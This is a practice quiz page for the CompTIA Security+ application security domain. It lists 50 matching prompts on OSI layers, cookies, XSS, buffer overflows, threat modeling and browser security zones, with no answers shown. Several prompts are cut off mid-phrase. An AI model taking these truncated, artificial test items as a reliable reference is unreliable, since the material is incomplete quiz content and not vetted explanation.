Test your basic knowledge |

Comptia Security +: Domain4 Application Security

Instructions:
  • Answer 50 questions in 15 minutes.
  • If you are not ready to take this test, you can study here.
  • Match each statement with the correct term.
  • Don't refresh. All questions and answers are randomly picked and ordered every time you load a test.

This is a study tool. The 3 wrong answers for each question are randomly chosen from answers to other questions. So, you might find at times the answers obvious, but you will see it re-enforces your understanding as you take the test each time.
1. Security objectives placed on an application are identified - controlling the scope of the threat modeling process






2. Three main cookie types






3. A named collection of Web sites that can be assigned a specific security level






4. OSI layer that provides transparent transfer of data between end users






5. This layer formats and encrypts data to be sent across a network - providing freedom from compatibility problems - sometimes called the syntax layer






6. Enticing a user to execute malicious code stored on a web server (i.e. via hyperlink in an email)






7. OSI layer responsible for path determination and logical addressing - routers operate at this layer






8. OSI layer that establishes - manages and terminates the connections between the local and remote application






9. Have a timeout value - are not deleted when the user closes their web brower - used to store user preferences and information about the use connection






10. Categories of XSS






11. Scripting languages - developed by Microsoft to allow developers to extend and reuse web functionality






12. Used to record user's web activity - may be downloaded in the background






13. Allow an attacker to intercept and modifiy data sent between two network devices - hijacking of network communications - attacks data link layer






14. OSI layer responsible for end-to-end connections and reliability (i.e. TCP






15. Cause of open SMTP relays






16. P2P stands for...






17. The unauthorized modification of the data stored within a cookie






18. Protocols in this layer NNTP






19. Each client is a peer and serves each other client on the network - requires client application and appropriate open network ports to operate






20. Attack that occurs when a user navigates to a web site and hostile content is automatically downloaded and executed






21. Protocols used in this layer - IP






22. Enable the cookie secure-bit setting - avoid using cookies to hold sensitive data - block third-party cookies will prevent ______






23. XSS stands for






24. Type - length - format - range






25. Phase of threat modeling that reviews application ingress and egress data flow and trust boundaries






26. Sensitive information stored within a cookie that is obtained by unauthorized users






27. Process to identify and assess a system's security risks






28. OSI layer that provides the means to transfer data between network entities and detect/correct errors that may occur in the physical layer






29. Deleted when the user closes their web browser - can contain authentication-related information






30. COTS stands for






31. Phases of threat modeling






32. OSI layer responsible for data representation and encryption (MIME






33. Target for trojans and viruses - used to transfer stolen/pirated data - unintentional disclosure of data are risks associated with






34. OSI layer that relates to the physical connection of two devices (i.e. RS-232






35. Ensure data input is validated - encode user supplied data - don't click on unknown hyperlinks - implement restrictive web browser security zones are preventative measures against






36. A method of code signing - allows developers to obtain digital certificate generated by a certificate authority and digitally sign ActiveX controls






37. OSI layer defines the electrical / physical device specs (media - signal - and binary transmission). This includes the layout of pins - voltages - cable specifications - hubs - network adapters - host bus adapters and more.






38. Area of the memory where function calls are stored






39. Attackers sniff network traffic and capture a cookie download or gain access to a computer and view locally stored cookie






40. Security zone options offered by Internet Explorer






41. OSI model layers






42. A scripting language - developed by Netscape to perform client-side web development






43. Can leave the sandbox and obtain access to client resources






44. ARP stands for...






45. OSI layer attributed with 75% of malicious attacks






46. OSI layer that provides interhost communication (Named Pipes






47. Can filter out most buffer overflow attacks






48. Number one safeguard against buffer overflow - XSS - data injection - and DoS attacks






49. Protocols used in this layer (ARP






50. Key functionality (how the application works) is identified and an application diagram developed in this phase of threat modeling